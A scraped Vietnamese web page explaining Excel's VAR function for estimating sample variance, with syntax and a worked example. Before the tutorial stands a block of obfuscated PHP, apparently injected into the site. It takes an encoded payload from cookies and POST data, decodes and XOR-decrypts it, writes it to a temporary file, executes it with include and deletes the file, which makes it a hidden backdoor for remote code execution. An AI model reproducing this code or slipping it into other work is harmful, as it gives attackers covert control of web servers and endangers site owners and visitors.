$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm VAR - hàm ước tính phương sai - Tải Chùa

Hàm VAR – hàm ước tính phương sai

Rate this post

Hàm VAR trong Excel là hàm ước tính phương sai dựa trên mẫu từ của các một tập các số liệu cho trước. Các đối số có trong hàm  VAR có thể là số hoặc tên, cũng có thể là mảng hoặc tham chiếu có chứa số. Hàm VAR này giả định các đối số của nó là một mẫu của tập hợp. Và bạn có thể dùng hàm VAR để tính toán phương sai nếu dữ liệu thể hiện cho toàn bộ tập hợp.

Hàm VAR trong Excel

Hàm VAR trong Excel

Với nhiều bài toán được ứng dụng trong thực tế rất cần có sự ứng dụng của lý thuyết xác suất. Đôi khi, có những bài toán yêu cầu bạn phải thực hiện ước tính phương sai dựa trên mẫu. Khi đó, việc sử dụng hàm VAR là rát cần thiết. Nếu bạn chưa biết về cú pháp cũng như cách sử dụng của hàm VAR này trong excel thì hãy theo dõi bài viết này của chúng tôi bạn nhé.

Hướng dẫn cách sử dụng hàm VAR trong Excel

Cú pháp thực hiện: VAR(số 1, số 2,…)

Trong Đó:

  • Số 1 : Là đối số đầu tiên của số thứ nhất tương ứng với một mẫu trong một tập hợp. Số này bắt buộc phải có.
  • Số 2 : Là các đối số dạng số từ 2 đến 255 tương ứng với một mẫu của một tập hợp. Và nó có thể có hoặc có thể không.

Hàm VAR trong Excel

Chú ý hàm var trong excel.

Xét ví dụ minh họa cho hàm VAR

Bạn hãy nhập vào Excel các giá trị thực tế tương ứng với các tham số của hàm VAR.

 Hàm VAR trong excel

Các giá trị tương ứng với tham số của hàm VAR

Tiến hành nhập công thức hàm VAR tại ô C11. Khi đó, kết quả thu được sẽ như hình dưới đây.

 Hàm VAR trong excel

Kết quả thu được của hàm VAR.

Với bài viết này, bạn là đã biết cách sử dụng hàm VAR rồi. Nhưng lưu ý rằng, các tham số trong hàm VAR này cần nhập đúng kiểu dữ liệu để tính toán. Bởi nếu đối số là văn bản hay giá trị lỗi thì sẽ không thể chuyển đổi thành số được.